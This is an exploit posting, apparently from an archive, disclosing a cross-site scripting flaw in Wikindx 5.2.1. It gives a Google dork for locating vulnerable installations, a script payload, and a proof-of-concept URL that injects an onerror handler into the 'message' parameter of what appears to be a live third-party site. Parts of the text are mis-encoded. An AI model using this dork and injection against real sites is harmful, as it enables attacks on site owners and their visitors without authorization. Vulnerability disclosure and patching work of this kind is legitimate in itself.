Wikindx 5.2.1 Cross Site Scripting

Wikindx version 5.2.1 suffers from a cross site scripting vulnerability.


MD5 | fa0052bde3ea2d37d998c677aae7ee0a

============================================================================================================================
| # Title : Wikindx5.2.1 xss Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 FranASSais V.(Pro) | |
| # Vendor : http://www.wikindx.com/ |
| # Dork : "wikindx 5.2.1 A(c)2017 | " |
============================================================================================================================

poc :

[+] Dorking Adegn Google Or Other Search Enggine

[+] Use Payload : <script>alert(/indoushka/);</script>

http://www.hansdieterhiep.nl/wikindx/index.php?action=help_HELPMESSAGES_CORE&message=preferences<video><source onerror%3d"javascript:alert(/indoushka/)">

Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================

Related Posts

Comments